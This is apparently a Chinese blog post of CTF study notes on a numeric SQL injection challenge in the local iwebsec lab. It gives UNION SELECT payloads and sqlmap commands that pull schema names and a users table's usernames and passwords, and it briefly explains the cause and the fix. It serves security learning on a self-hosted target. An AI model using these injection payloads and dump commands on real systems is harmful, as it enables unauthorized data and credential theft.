CTF学习笔记2:iwebsec-SQL注入漏洞-01-数字型注入

已于 2022-01-22 16:40:27 修改
阅读量3.3k 收藏 22
点赞数 3
分类专栏: CTF 文章标签: sql 安全 web安全
于 2022-01-22 15:46:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lifeng_dc/article/details/122637464
版权

目录


温馨提示:本篇为最简单的SQL注入入门,是在自己本地虚拟机的靶场上练习,为的是了解安全防御技术。切勿在未经授权的情况下,测试或攻击他人网站或系统,否则将承担法律责任!见《网络安全法》具体条款。

一、手工解题过程

用到的工具:
1.Chrome浏览器和HackerBar插件(也可用firefox)
2.sqlmap(非必须)

(一)题目概览

1.题目路径

在这里插入图片描述

2.HackerBar使用

在这里插入图片描述

3.测试结果集列数为3列

?id=1 order by 4

在这里插入图片描述

4.具体获取数据过程

因为页面只输出一行数据,先给id传递-1,再用union select查询自己想要的数据。group_concat函数是将多行数据合并在一起输出

(1)取得当前应用的数据库名
?id=-1 union select 1,2,(database())

在这里插入图片描述
还可获取所有数据库名

?id=-1 union select 1,2,group_concat(schema_name) from information_schema.schemata
(2)取得当前数据库的所有表名
?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()

在这里插入图片描述

(3)取得users表的列名
?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'

在这里插入图片描述

(4)获取users表里的数据

本例中的密码数据是明文,没有加密,实际项目中都要加盐加密

?id=-1 union select 1,2,group_concat(concat(username,0x7e,password)) from iwebsec.users

0x7e是波浪线的16进制形式
在这里插入图片描述

二、SQL注入题目的一般套路

(一)从information_schema模式信息出发了解数据库信息

# 获取数据库信息
mysql> select * from information_schema.schemata;
+--------------+--------------------+----------------------------+------------------------+----------+
| CATALOG_NAME | SCHEMA_NAME        | DEFAULT_CHARACTER_SET_NAME | DEFAULT_COLLATION_NAME | SQL_PATH |
+--------------+--------------------+----------------------------+------------------------+----------+
| def          | information_schema | utf8                       | utf8_general_ci        | NULL     |
| def          | Ashop              | utf8                       | utf8_general_ci        | NULL     |
| def          | lunar              | utf8                       | utf8_general_ci        | NULL     |
| def          | mysql              | utf8mb4                    | utf8mb4_general_ci     | NULL     |
| def          | performance_schema | utf8                       | utf8_general_ci        | NULL     |
| def          | test               | utf8mb4                    | utf8mb4_general_ci     | NULL     |
+--------------+--------------------+----------------------------+------------------------+----------+
6 rows in set (0.09 sec)

# 获取表信息
mysql> select table_schema,table_name 
       from information_schema.tables 
       where table_schema='lunar';
+--------------+--------------+
| table_schema | table_name   |
+--------------+--------------+
| lunar        | contact_form |
| lunar        | pages        |
| lunar        | settings     |
| lunar        | stats        |
| lunar        | users        |
+--------------+--------------+
5 rows in set (0.00 sec)

# 获取字段信息
mysql> select table_schema,table_name,column_name 
	   from information_schema.columns 
	   where table_schema='lunar' and table_name='users';
+--------------+------------+-------------+
| table_schema | table_name | column_name |
+--------------+------------+-------------+
| lunar        | users      | ID          |
| lunar        | users      | access      |
| lunar        | users      | name        |
| lunar        | users      | email       |
| lunar        | users      | password    |
+--------------+------------+-------------+
5 rows in set (0.03 sec)

# 获取数据
mysql> select * from lunar.users;
+----+--------+------+-----------------+------------------------------------------+
| ID | access | name | email           | password                                 |
+----+--------+------+-----------------+------------------------------------------+
|  1 |      0 | 123  | 12121212@QQ.COM | 7c4a8d09ca3762af61e59520943dc26494f8941b |
+----+--------+------+-----------------+------------------------------------------+
1 row in set (0.00 sec)

(二)本题中的用到的SQL语句

#1.取得表名
select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()
#2.取得列名
select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'
#3.获取数据
select 1,2,group_concat(concat(username,0x7e,password)) from iwebsec.users

一般解SQL注入都是这种套路,只不过后面的题目会逐渐加上各种过滤,你就需要各种绕过,因此,后续的题目不需要介绍全部过程,只要说明关键绕过方法即可。

三、分析SQL注入漏洞产生的原因和防范

(一)进入靶场内部查看应用原代码

docker exec -it iwebsec bash
cat /var/www/html/sqli/01.php

在这里插入图片描述

(二)漏洞产生的原因和修补方法

原因就是没有对输入的参数进行过滤,修补方法就是先过滤再执行,在后续的题目中可以看到,后续将继续学习。

四、用sqlmap工具自动注入

(一)获取数据库名

1.获取所有数据库名

sqlmap -u http://192.168.182.130:8001/sqli/01.php?id=1 --dbs

在这里插入图片描述

2.获取应用当前数据库名

sqlmap -u http://192.168.182.130:8001/sqli/01.php?id=1 --current-db

在这里插入图片描述

(二)获取表名

sqlmap -u http://192.168.182.130:8001/sqli/01.php?id=1 --tables -D iwebsec

在这里插入图片描述

(三)获取列名

sqlmap -u http://192.168.182.130:8001/sqli/01.php?id=1 --columns -D iwebsec -T users

在这里插入图片描述

(四)获取数据

1.仅获取password一列数据

sqlmap -u http://192.168.182.130:8001/sqli/01.php?id=1 --dump -D iwebsec -T users -C password

在这里插入图片描述

2.获取所有数据

sqlmap -u http://192.168.182.130:8001/sqli/01.php?id=1 --dump-all -D iwebsec

在这里插入图片描述

lvx++
关注
  • 3
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTFHUB-web-SQL注入
ookami6497的博客
11-29 779
CTFHUB SQL
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...
CTF学习笔记13:iwebsec-SQL注入漏洞-11-十六进制绕过
lvx++的博客
01-23 1497
一、本题难道名不符实,用第1题数字型payload直接打出结果 二、原来是payload中没有单引号,实际做题过程要一步步分析,那么来看看取列名这一步会怎样 (一)果然报错: (二)原因如下: (三)用users的十六制代替 ?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 ...
2024年最新CTF Web SQL注入专项整理(持续更新中)_ctf sql注入,一文轻松搞定
2401_84968222的博客
05-16 863
使用right()突破字符限制得到后一段flag值b-403a-8062-80f219ca1c30}好了大家已经明显看到了^和()绕过不同限制的区别那么下面就给大家一直演示^绕过or限制了(上一个updatexml()函数使用的是()绕过空格限制)使用right()突破字符限制原文链接:https://blog.csdn.net/m0_73734159/article/details/134450773。
CTF学习笔记——SQL注入
xuanyulevel6的博客
08-25 4907
以pikachu靶场练习来学习ctf知识
学习笔记四:sql手工注入
mcc的博客
06-05 1178
sql-labs靶机通关 原文链接:http://p0desta.com/2018/01/28/Sqli_labs%E9%80%9A%E5%85%B3%E6%96%87%E6%A1%A3/#less-29 1.Less-1 暴库 $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; #检查是否存在漏洞 http://127.0.0.1/4/L...
SQL注入之联合查询——ctf公开课笔记记录
m0_75196987的博客
04-18 479
SQL注入之联合查询——来自 长空实验室ctf新兵训练营。Sqli-labs靶场搭建以及做题wp将由我亲自实践并为大家呈现。
SQL注入基础--数字型注入
qq_42988351的博客
04-02 7734
参考 参考学习链接 学习笔记–基础篇–sql注入数字型SQL注入简述 SQL注入,就是利用现有Web应用程序,构建特殊的参数输入,将(恶意的)SQL语句注入到后台数据库引擎,最终达到欺骗服务器执行恶意SQL语句的目的。 SQL注入的本质是后台SQL语句使用了拼接查询,未对用户输入的数据作安全处理。 SQL注入分类 根据注入形式的不同,可分为: 数字型注 字符型注 搜索型注入 根据请求方式的不同,可分为: GET型注 POST型注 HEADER型注入 根据注入点位置的不同,可分为: 列
CTFSHOW -SQL 注入
m0_64180167的博客
11-13 694
重新来做一遍 争取不看wp。
从0到1 CTFer成功之路》SQL注入---学习笔记
aweiname2008的博客
06-13 479
《从0到1 CTFer成功之路》学习笔记 书中已经有很详细的代码讲解,但是部分测试代码需要自己来敲,还要搭建php+mysql环境,如果这些有docker不就更好了,我自己是在虚拟机中搭建中,记录一下学习过程,希望能帮助到有需要的人。学习笔记按书的章节记录,并非全部零星记录。 第1章 web入门 1.2 CTF中的SQL注入 1.21 SQL基础 测试使用的php代码: <?php //连接本地MySQL,数据库为test $conn = mysqli_connect("127.0.0.1","
网络安全-自学笔记
热门推荐
关注网络安全、云原生安全
12-01 17万+
目录 WEB(应用)安全 前端安全 xss攻击 后端安全 文件上传漏洞 WebShell 解析安全 数据安全 sql注入 通信安全 WEB(应用)安全 前端安全 xss攻击 后端安全 文件上传漏洞 WebShell 解析安全 数据安全 sql注入 网络安全-sqlmap学习笔记 通信安全 网络-http协议学习笔记(消息结构、请求方法、状态码等) ...
cypherpunks-ctf:Cypherpunks CTF 智能合约漏洞攻击
05-14
Cypherpunks CTF Cypherpunks CTF是一款基于Web3 / 的战争游戏,灵感来自 ,该游戏将在以太坊虚拟机中进行播放。 每个级别都是一个需要被“破解”的智能合约。 欢迎等级PR! 在本地运行 安装所有软件包 ...
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
java红酒网站源码-ctf-katana:ctf-武士刀
06-05
java网站源码CTF-武士刀 约翰哈蒙德 | 2018 年 2 月 1 日 在撰写本文时,此存储库将仅托管可能有助于解决 CTF 挑战的工具和命令列表。 我希望将其保留为“实时文档”,理想情况下它不会像我制作的旧“工具”页面 () ...
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
SQL Server 临时存储过程及示例
最新发布
08-05 352
在本文中,我们将深入探讨 SQL Server 中的临时存储过程,并提供一些实际的示例。在我们之前的文章中,我们讨论了 SQL Server 存储过程中的返回值。前缀创建的存储过程称为全局临时存储过程。这种类型的存储过程可以被 SQL Server 中的其他连接访问,直到创建该过程的连接关闭为止。在数据库中临时创建的存储过程称为临时存储过程,这些存储过程不会永久存储在数据库中。临时存储过程在连接到不支持 Transact-SQL 语句或批次的执行计划重用的早期版本的 SQL Server 时非常有用。
力扣高频SQL 50题(基础版)第三十八题
m0_70882914的博客
08-02 384
1484.按日期分组销售产品
力扣高频SQL 50题(基础版)第三十七题
m0_70882914的博客
08-02 274
176.第二高的薪水
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值